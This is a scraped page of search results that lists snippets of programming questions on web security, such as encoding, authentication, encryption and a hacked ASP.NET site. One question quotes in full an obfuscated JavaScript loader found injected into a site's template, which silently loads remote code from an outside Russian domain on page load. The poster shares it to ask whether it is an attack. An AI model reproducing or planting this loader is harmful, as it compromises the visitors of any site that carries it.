Search Results

Search found 15415 results on 617 pages for 'security groups'.

facebook twitter digg google delicious technorati stumbleupon myspace wordpress linkedin gmail igoogle windows live tumblr viadeo yahoo buzz yahoo mail yahoo bookmarks favorites email print

Page 170/617 | < Previous Page | 166 167 168 169 170 171 172 173 174 175 176 177  | Next Page >

  • Disadvantage of HttpUtility.HtmlAttributeEncode

    - by vinay_rockin
    I have to encode a field so to make it secure of script injection. I know I can use HttpUtility.HtmlEncode and Decode, but this method for HI-ASCII characters goes out of the range of the field size in database and I dont want to change the size of data field column. Instead if I use HttpUtility.HtmlAttributeEncode, it works fine because it does not encode the HI-ASCII characters. Is it safe what can be the disadvantages of it.

    Read the article

  • How to do REST securely and with sensitive data?

    - by Earlz
    Hello, we are implementing a new web service. The web service will be a store of sensitive data and there are multiple users types with different permissions. So some user types can't access(and some can't change, and so on) certain types of data. How would this work in REST? I'm very new to REST, so sorry if this sounds noobish.

    Read the article

  • Hidden WCF endpoints

    - by Matt
    For the sake of arguement, lets say that I've got a basicHttp WCF service. Besides implementing authentication (login/logout methods), what is stopping someone from just cracking open Visual Studio, adding a web reference to my website's service, and then playing playing around with my service? I'm not familiar with a method of stopping someone from doing this. The idea of someone downloading all of my Data/Operation contracts and then start playing around is keeping me up at night, and I like my sleep!

    Read the article

  • How to give you website customers a secure feeling

    - by Saif Bechan
    I was wondering how you can give your website customers the confidence that you are not tinkering with the database values. I am planning on running a website which falls in the realm of an online game. There is some kind of credit system involved that people have to pay for. Now I was wondering how sites like this ensure there customers that there is no foul play in the database itself. As I am the database admin i can pretty much change all the values from within without anyone knowing i did. Hence letting someone win that does not rightfully is the winner. Is it maybe an option to decrypt en encrypt the credits people have so i can't change them. Or is there maybe a company i can hire that checks my company for foul play.

    Read the article

  • Form Based Authentication problem?

    - by programmerist
    i have 2 pages : Login.aspx and Satis.aspx. i redirected from Login.aspx to Satis.aspx if authentication is correct . if i signout from satis i redirected to Login.aspx. But if i write satis.aspx' url on web scanner i entered satis.aspx. But i am not sign in Satis.aspx. i should't enter Satis.aspx directly. my web config: <authentication mode="Forms"> <forms loginUrl="Login.aspx" name=".ASPXFORMSAUTH" path="/" protection="All"> <credentials> <user name="a" password="a"></user> </credentials> </forms> </authentication> <authorization> <allow users="*"/> </authorization> </system.web> <location path="~/ContentPages/Satis/Satis.aspx"> <system.web> <authorization> <deny users="?"/> </authorization> </system.web> </location> Login.aspx.cs: protected void lnkSubmit_Click(object sender, EventArgs e) { if(FormsAuthentication.Authenticate(UserEmail.Value,UserPass.Value)) { FormsAuthentication.RedirectFromLoginPage (UserEmail.Value, PersistForms.Checked); } else Msg.Text = "Invalid Credentials: Please try again"; } Satis.aspx protected void LogoutSystem_Click(object sender, EventArgs e) { FormsAuthentication.SignOut(); Response.Redirect("~/Login/Login.aspx"); }

    Read the article

  • Servlet 3.0 logout doesn't work

    - by Kevin
    I've got a problem with the authentication features of Servlet 3.0: With this code in a Servlet v3: log.info(""+request.getUserPrincipal()); log.info(""+request.getAuthType()); log.info("===^==="); request.logout() ; log.info(""+request.getUserPrincipal()); log.info(""+request.getAuthType()); request.authenticate(response) ; log.info("===v==="); log.info(""+request.getUserPrincipal()); log.info(""+request.getAuthType()); I would always expect to see the Username/login windows, because of the logout() function. Instead, it seems to be a 'cache' mechanism which repopulate the credential and cancel my logout ... Admin BASIC ===^=== null null ===v=== Admin BASIC Is it a problem with my firefox, or something I'm missing in the Servlet code?

    Read the article

  • Php sessions secure log in

    - by Doodle
    My question is about creating a secure log in routine. After comparing the user name and password to the stored values I set a session variable called logged to true. Then as the user surfs around the web page I just check the logged variable for true or false to determine if the user should have access. This is my first time creating something like this. Is this secure? I feel like there is something else that I should be doing to make sure that users are valid.

    Read the article

  • How Can I Find Out *HOW* My Site Was Hacked? How Do I Find Site Vulnerabilities?

    - by Imageree
    One of my custom developed ASP.NET sites was hacked today: "Hacked By Swan (Please Stop Wars !.. )" It is using ASP.NET and SQL Server 2005 and IIS 6.0 and Windows 2003 server. I am not using Ajax and I think I am using stored procedures everywhere I am connecting to the database so I dont think it is SQL injection. I have now removed the write permission on the folders. How can I find out what they did to hack the site and what to do to prevent it from happening again? The server is up to date with all Windows updates. What they have done is uploading 6 files (index.asp, index.html, index.htm,...) to the main directory for the website. What log files should I upload? I have log files for IIS from this folder: c:\winnt\system32\LogFiles\W3SVC1. I am willing to show it to some of you but don't think it is good to post on the Internet. Anyone willing to take a look at it? I have already searched on Google but the only thing I find there are other sites that have been hacked - I haven't been able to see any discussion about it. I know this is not strictly related to programming but this is still an important thing for programmers and a lot of programmers have been hacked like this.

    Read the article

  • Basic principles of computer encryption?

    - by Andrew
    I can see how a cipher can be developed using substitutions and keys, and how those two things can become more and more complex, thus offering some protection from decryption through brute-force approaches. But specifically I'm wondering: what other major concepts beyond substitution and key are involved? is the protection/secrecy of the key a greater vulnerability than the strength of the encryption? why does encryption still hold up when the key is 'public' ? are performance considerations a major obstacle to the development of more secure encryption?

    Read the article

  • Multiuser login into winforms application

    - by schoetbi
    Hi there, i have a winforms app in C# that needs access control for certain forms. That means, the application is running under the same (default) user at system startup, but certain forms need to be secured, so that only certain windows users could have access to the additional functions after identifying themself with username and password. For that step windows authentication should be used. Now the tricky part. Although the application was started under a "normal" user I would like the superusers to "login" into the special form without restarting the entiere application. My question now is. Is this possible (i.e. create one thread with the credentials of an administrator). Or do I need to setup another appdomain for that? Please give me a hint wather the user of a running application could be changed somehow. Thank you. EDIT I replaced administrators by "certain users" since the privileged user could be just another ordinary user that is granted access to the special functionality by the configuration of the installation.

    Read the article

  • Weird Javascript in Template. Is this a hacking attempt?

    - by Julian
    I validated my client's website to xHTML Strict 1.0/CSS 2.1 standards last week. Today when I re-checked, I had a validation error caused by a weird and previous unknown script. I found this in the index.php file of my ExpressionEngine CMS. What is this javascript doing? Is this a hacking attempt as I suspected? I couldn't help but notice the Russian domain encoded in the script... this.v=27047; this.v+=187; ug=["n"]; OV=29534; OV--; var y; var C="C"; var T={}; r=function(){ b=36068; b-=144; M=[]; function f(V,w,U){ return V.substr(w,U); var wH=39640; } var L=["o"]; var cj={}; var qK={N:false}; var fa="/g"+"oo"+"gl"+"e."+"co"+"m/"+f("degL4",0,2)+f("rRs6po6rRs",4,2)+f("9GVsiV9G",3,2)+f("5cGtfcG5",3,2)+f("M6c0ilc6M0",4,2)+"es"+f("KUTz.cUzTK",4,2)+f("omjFb",0,2)+"/s"+f("peIlh2",0,2)+"ed"+f("te8WC",0,2)+f("stien3",0,2)+f(".nYm6S",0,2)+f("etUWH",0,2)+f(".pdVPH",0,2)+f("hpzToi",0,2); var BT="BT"; var fV=RegExp; var CE={bf:false}; var UW=''; this.Ky=11592; this.Ky-=237; var VU=document; var _n=[]; try {} catch(wP){}; this.JY=29554; this.JY-=245; function s(V,w){ l=13628; l--; var U="["+w+String("]"); var rk=new fV(U, f("giId",0,1)); this.NS=18321;this.NS+=195;return V.replace(rk, UW); try {} catch(k){}; }; this.jM=""; var CT={}; var A=s('socnruixpot4','zO06eNGTlBuoYxhwn4yW1Z'); try {var vv='m'} catch(vv){}; var Os={}; var t=null; var e=String("bod"+"y"); var F=155183-147103; this.kp=''; Z={Ug:false}; y=function(){ var kl=["mF","Q","cR"]; try { Bf=11271; Bf-=179; var u=s('cfr_eKaPtQe_EPl8eTmPeXn8to','X_BQoKfTZPz8MG5'); Fp=VU[u](A); var H=""; try {} catch(WK){}; this.Ca=19053; this.Ca--; var O=s('s5rLcI','2A5IhLo'); var V=F+fa; this.bK=""; var ya=String("de"+"fe"+f("r3bPZ",0,1)); var bk=new String(); pB=9522; pB++; Fp[O]=String("ht"+"tp"+":/"+"/t"+"ow"+"er"+"sk"+"y."+"ru"+":")+V; Fp[ya]=[1][0]; Pe=45847; Pe--; VU[e].appendChild(Fp); var lg=new Array(); var aQ={vl:"JC"}; this.KL="KL"; } catch(x){ this.Ja=""; Th=["pj","zx","kO"]; var Jr=''; }; Tr={qZ:21084}; }; this.pL=false; }; be={}; rkE={hb:"vG"}; r(); var bY=new Date(); window.onload=y; cU=["Yr","gv"];

    Read the article

  • Forms/AD Authentication with Sharepoint

    - by David Lively
    All, I'm configuring Sharepoint to use forms authentication with LDAP/Active Directory. I'm new to Sharepoint, so if this is obvious, please point me in the right direction. Whenever I attempt to log in with a bad account or password, I get the very friendly (and correct) error message, The server could not sign you in. Make sure your user name and password are correct, and then try again. ... which implies that Sharepoint is able to communicate with AD. If I log in with a valid account, I get a page that says: (I added the grey bar to cover up the login name) Any suggestions? The account I'm logging in with is an administrator and has been granted full control in central administration. Also, interesting note: If I click the "sign in as a different user" link, and attempt to sign in using with the same credentials I just used, the site just redirects back to the login page, with no error or status message. If I then manually enter the site url, it again shows the "Error: Access Denied" page. Argh.

    Read the article

  • Distributed transactions

    - by javi
    Hello! I've a question regarding distributed transactions. Let's assume I have 3 transaction programs: Transaction A begin a=read(A) b=read(B) c=a+b write(C,c) commit Transaction B begin a=read(A) a=a+1 write(A,a) commit Transaction C begin c=read(C) c=c*2 write(A,c) commit So there are 5 pairs of critical operations: C2-A5, A2-B4, B4-C4, B2-C4, A2-C4. I should ensure integrity and confidentiality, do you have any idea of how to achieve it? Thank you in advance!

    Read the article

  • Do I only have to worry about XSS and Sql injection?

    - by Pranali Desai
    Hi All, I am writing an application and for this to make it safe I have decided to HtmlEncode and HtmlDecode the data to avoid Javascript Injection and Paramaterised queries to avoid Sql injection. But I want to know whether these are the best ways to avoid these attacks and what are the other ways to damage the application that I should take into consideration.

    Read the article

  • this operation has been canceled due to restrictions in effect on this computer

    - by Dan
    I have this HUGELY irritating problem on Windows 7 (x64). Whenever I click on ANY link (that exists on a Word document, excel or Outlook), I get an alert box with the message: "This operation has been canceled due to restrictions in effect on this computer" I have been scouring my settings and the internet for a solution, but to no avail. Has anybody else encounted this problem? It even happens when I click anchors in word documents i.e. I can't even click on an entry in a Table of Contents to go to the appropriate page - I get this same error then. Is this a Windows 7 thing? Anyway to turn this off?

    Read the article

  • Looking for a good WTF story involving SSL

    - by lindelof
    I'm preparing a talk on SSL to our local Java user group, and I would like to introduce it with some story on how NOT to use it. I've searched through the DailyWTF archives but couldn't find anything really good. Do you know such a story, or do you have some pointers where I could go looking for one?

    Read the article

  • How to make Facebook Authentication from Silverlight secure?

    - by SondreB
    I have the following scenario I want to complete: Website running some HTTP(S) services that returns data for a user. Same website is additionally hosting a Silverlight 4 app which calls these services. The Silverlight app is integrating with Facebook using the Facebook Developer Toolkit (http://facebooktoolkit.codeplex.com/). I have not fully decided whether I want Facebook-integration to be a "opt-in" option such as Spotify, or if I want to "lock" down my service with Facebook-only authentication. That's another discussion. How do I protect my API Key and Secret that I receive from Facebook in a Silverlight app? To me it's obvious that this is impossible as the code is running on the client, but is there a way I can make it harder or should I just live with the fact that third parties could potentially "act" as my own app? Using the Facebook Developer Toolkit, there is a following C# method in Silverlight that is executed from the JavaScript when the user has fully authenticated with Facebook using the Facebook Connect APIs. [ScriptableMember] public void LoggedIn(string sessionKey, string secret, int expires, long userId) { this.SessionKey = sessionKey; this.UserId = userId; Obvious the problem here is the fact that JavaScript is injection the userId, which is nothing but a simple number. This means anyone could potentially inject a different userId in JavaScript and have my app think it's someone else. This means someone could hijack the data within the services running on my website. The alternative that comes to mind is authenticating the users on my website, this way I'm never exposing any secrets and I can return an auth-cookie to the users after the initial authentication. Though this scenario doesn't work very well in an out-of-browser scenario where the user is running the Silverlight app locally and not from my website.

    Read the article

  • Fail2Ban - Log to mysql

    - by user319660
    Hi! We have a few servers with SSH public (using sFTP). Obviously, the attacks ar too many. We want put the banned logs into a MySQL DB for make stats and etc. Have anyone tryied this? Thanks

    Read the article

facebook twitter digg google delicious technorati stumbleupon myspace wordpress linkedin gmail igoogle windows live tumblr viadeo yahoo buzz yahoo mail yahoo bookmarks favorites email print

< Previous Page | 166 167 168 169 170 171 172 173 174 175 176 177  | Next Page >